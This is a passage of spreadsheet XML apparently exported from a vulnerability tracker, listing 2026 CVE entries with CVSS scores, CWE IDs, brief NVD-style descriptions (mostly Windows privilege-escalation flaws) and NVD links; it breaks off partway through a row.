        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86725</t>
        </is>
      </c>
      <c r="D886" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E886" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F886" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G886" s="5" t="inlineStr"/>
      <c r="H886" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I886" s="5" t="inlineStr"/>
      <c r="J886" s="5" t="inlineStr"/>
      <c r="K886" s="5" t="inlineStr"/>
      <c r="L886" s="5" t="inlineStr"/>
      <c r="M886" s="5" t="inlineStr"/>
      <c r="N886" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O886" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P886" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q886" s="5" t="inlineStr"/>
      <c r="R886" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S886" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86725</t>
        </is>
      </c>
    </row>
    <row r="887">
      <c r="A887" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B887" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86734</t>
        </is>
      </c>
      <c r="D887" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E887" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F887" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G887" s="5" t="inlineStr"/>
      <c r="H887" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I887" s="5" t="inlineStr"/>
      <c r="J887" s="5" t="inlineStr"/>
      <c r="K887" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L887" s="5" t="inlineStr"/>
      <c r="M887" s="5" t="inlineStr"/>
      <c r="N887" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O887" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P887" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q887" s="5" t="inlineStr"/>
      <c r="R887" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S887"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T887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86734</t>
        </is>
      </c>
    </row>
    <row r="888">
      <c r="A888" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B888" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9331</t>
        </is>
      </c>
      <c r="D888" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E888" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F888" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G888" s="5" t="inlineStr"/>
      <c r="H888" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I888" s="5" t="inlineStr"/>
      <c r="J888" s="5" t="inlineStr"/>
      <c r="K888" s="5" t="inlineStr"/>
      <c r="L888" s="5" t="inlineStr"/>
      <c r="M888" s="5" t="inlineStr"/>
      <c r="N888" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O888" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P888" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q888" s="5" t="inlineStr"/>
      <c r="R888" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S888" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9331</t>
        </is>
      </c>
    </row>
    <row r="889">
      <c r="A889" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B889" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50349</t>
        </is>
      </c>
      <c r="D889" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E889" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F889" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G889" s="5" t="inlineStr"/>
      <c r="H889" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I889" s="5" t="inlineStr"/>
      <c r="J889" s="5" t="inlineStr"/>
      <c r="K889" s="5" t="inlineStr"/>
      <c r="L889" s="5" t="inlineStr"/>
      <c r="M889" s="5" t="inlineStr"/>
      <c r="N889" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O889" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P889" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q889" s="5" t="inlineStr"/>
      <c r="R889" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S889" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50349</t>
        </is>
      </c>
    </row>
    <row r="890">
      <c r="A890" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B890" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58848</t>
        </is>
      </c>
      <c r="D890" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E890" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F890" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G890" s="5" t="inlineStr"/>
      <c r="H890" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I890" s="5" t="inlineStr"/>
      <c r="J890" s="5" t="inlineStr"/>
      <c r="K890" s="5" t="inlineStr"/>
      <c r="L890" s="5" t="inlineStr"/>
      <c r="M890" s="5" t="inlineStr"/>
      <c r="N890" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O890" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P890" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q890" s="5" t="inlineStr"/>
      <c r="R890" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S890" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of alloc.c, there is a possible unauthorized read/write access due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58848</t>
        </is>
      </c>
    </row>
    <row r="891">
      <c r="A891" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B891" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62653</t>
        </is>
      </c>
      <c r="D891" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E891" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F891" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G891" s="5" t="inlineStr"/>
      <c r="H891" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I891" s="5" t="inlineStr"/>
      <c r="J891" s="5" t="inlineStr"/>
      <c r="K891" s="5" t="inlineStr"/>
      <c r="L891" s="5" t="inlineStr"/>
      <c r="M891" s="5" t="inlineStr"/>
      <c r="N891" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O891" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P891" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q891" s="5" t="inlineStr"/>
      <c r="R891" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S891"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T891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62653</t>
        </is>
      </c>
    </row>
    <row r="892">
      <c r="A892" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B892" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62654</t>
        </is>
      </c>
      <c r="D892" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E892" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F892" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G892" s="5" t="inlineStr"/>
      <c r="H892" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I892" s="5" t="inlineStr"/>
      <c r="J892" s="5" t="inlineStr"/>
      <c r="K892" s="5" t="inlineStr"/>
      <c r="L892" s="5" t="inlineStr"/>
      <c r="M892" s="5" t="inlineStr"/>
      <c r="N892" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O892" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P892" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q892" s="5" t="inlineStr"/>
      <c r="R892" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="S892" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62654</t>
        </is>
      </c>
    </row>
    <row r="893">
      <c r="A893" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B893" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62694</t>
        </is>
      </c>
      <c r="D893" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E893" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F893" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G893" s="5" t="inlineStr"/>
      <c r="H893" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I893" s="5" t="inlineStr"/>
      <c r="J893" s="5" t="inlineStr"/>
      <c r="K893" s="5" t="inlineStr"/>
      <c r="L893" s="5" t="inlineStr"/>
      <c r="M893" s="5" t="inlineStr"/>
      <c r="N893" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O893" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P893" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q893" s="5" t="inlineStr"/>
      <c r="R893" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S893" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62694</t>
        </is>
      </c>
    </row>
    <row r="894">
      <c r="A894" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B894" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68824</t>
        </is>
      </c>
      <c r="D894" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E894" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F894" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G894" s="5" t="inlineStr"/>
      <c r="H894" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I894" s="5" t="inlineStr"/>
      <c r="J894" s="5" t="inlineStr"/>
      <c r="K894" s="5" t="inlineStr"/>
      <c r="L894" s="5" t="inlineStr"/>
      <c r="M894" s="5" t="inlineStr"/>
      <c r="N894" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O894" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P894" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q894" s="5" t="inlineStr"/>
      <c r="R894" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S894" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68824</t>
        </is>
      </c>
    </row>
    <row r="895">
      <c r="A895" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B895" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68825</t>
        </is>
      </c>
      <c r="D895" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E895" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F895" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G895" s="5" t="inlineStr"/>
      <c r="H895" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I895" s="5" t="inlineStr"/>
      <c r="J895" s="5" t="inlineStr"/>
      <c r="K895" s="5" t="inlineStr"/>
      <c r="L895" s="5" t="inlineStr"/>
      <c r="M895" s="5" t="inlineStr"/>
      <c r="N895" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O895" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P895" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q895" s="5" t="inlineStr"/>
      <c r="R895" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S895" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bind Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68825</t>
        </is>
      </c>
    </row>
    <row r="896">
      <c r="A896" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B896" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68837</t>
        </is>
      </c>
      <c r="D896" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E896" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F896" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G896" s="5" t="inlineStr"/>
      <c r="H896" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I896" s="5" t="inlineStr"/>
      <c r="J896" s="5" t="inlineStr"/>
      <c r="K896" s="5" t="inlineStr"/>
      <c r="L896" s="5" t="inlineStr"/>
      <c r="M896" s="5" t="inlineStr"/>
      <c r="N896" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O896" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P896" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q896" s="5" t="inlineStr"/>
      <c r="R896" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S896" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68837</t>
        </is>
      </c>
    </row>
    <row r="897">
      <c r="A897" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B897" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68840</t>
        </is>
      </c>
      <c r="D897" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E897" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F897" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G897" s="5" t="inlineStr"/>
      <c r="H897" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I897" s="5" t="inlineStr"/>
      <c r="J897" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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97" s="5" t="inlineStr"/>
      <c r="M897" s="5" t="inlineStr"/>
      <c r="N897" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O897" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P897" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q897" s="5" t="inlineStr"/>
      <c r="R897" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S897" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t>
        </is>
      </c>
    </row>
    <row r="898">
      <c r="A898" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B898" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68847</t>
        </is>
      </c>
      <c r="D898" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E898" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F898" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G898" s="5" t="inlineStr"/>
      <c r="H898" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I898" s="5" t="inlineStr"/>
      <c r="J898" s="5" t="inlineStr"/>
      <c r="K898" s="5" t="inlineStr"/>
      <c r="L898" s="5" t="inlineStr"/>
      <c r="M898" s="5" t="inlineStr"/>
      <c r="N898" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O898" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P898" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q898" s="5" t="inlineStr"/>
      <c r="R898" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S898" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68847</t>
        </is>
      </c>
    </row>
    <row r="899">
      <c r="A899" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B899" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68884</t>
        </is>
      </c>
      <c r="D899" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E899" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F899" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G899" s="5" t="inlineStr"/>
      <c r="H899" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I899" s="5" t="inlineStr"/>
      <c r="J899" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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99" s="5" t="inlineStr"/>
      <c r="M899" s="5" t="inlineStr"/>
      <c r="N899" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O899" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P899" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q899" s="5" t="inlineStr"/>
      <c r="R899" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S899" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68884</t>
        </is>
      </c>
    </row>
    <row r="900">
      <c r="A900" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B900" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68897</t>
        </is>
      </c>
      <c r="D900" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E900" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F900" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G900" s="5" t="inlineStr"/>
      <c r="H900" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I900" s="5" t="inlineStr"/>
      <c r="J900" s="5" t="inlineStr"/>
      <c r="K900" s="5" t="inlineStr"/>
      <c r="L900" s="5" t="inlineStr"/>
      <c r="M900" s="5" t="inlineStr"/>
      <c r="N900" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O900" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P900" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q900" s="5" t="inlineStr"/>
      <c r="R900" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S900" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68897</t>
        </is>
      </c>
    </row>
    <row r="901">
      <c r="A901" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B901" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69275</t>
        </is>
      </c>
      <c r="D901" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E901" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F901" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G901" s="5" t="inlineStr"/>
      <c r="H901" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I901" s="5" t="inlineStr"/>
      <c r="J901" s="5" t="inlineStr"/>
      <c r="K901" s="5" t="inlineStr"/>
      <c r="L901" s="5" t="inlineStr"/>
      <c r="M901" s="5" t="inlineStr"/>
      <c r="N901" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O901" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P901" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q901" s="5" t="inlineStr"/>
      <c r="R901" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S901" s="5" t="inlineStr">
        <is>
          <t>Use after free in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69275</t>
        </is>
      </c>
    </row>
    <row r="902">
      <c r="A902" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B902" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69279</t>
        </is>
      </c>
      <c r="D902" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E902" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F902" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G902" s="5" t="inlineStr"/>
      <c r="H902" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I902" s="5" t="inlineStr"/>
      <c r="J902" s="5" t="inlineStr"/>
      <c r="K902" s="5" t="inlineStr"/>
      <c r="L902" s="5" t="inlineStr"/>
      <c r="M902" s="5" t="inlineStr"/>
      <c r="N902" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O902" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P902" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q902" s="5" t="inlineStr"/>
      <c r="R902" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S902" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69279</t>
        </is>
      </c>
    </row>
    <row r="903">
      <c r="A903" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B903" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69280</t>
        </is>
      </c>
      <c r="D903" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E903" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F903" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G903" s="5" t="inlineStr"/>
      <c r="H903" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I903" s="5" t="inlineStr"/>
      <c r="J903" s="5" t="inlineStr"/>
      <c r="K903" s="5" t="inlineStr"/>
      <c r="L903" s="5" t="inlineStr"/>
      <c r="M903" s="5" t="inlineStr"/>
      <c r="N903" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O903" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P903" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q903" s="5" t="inlineStr"/>
      <c r="R903" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S903" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69280</t>
        </is>
      </c>
    </row>
    <row r="904">
      <c r="A904" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
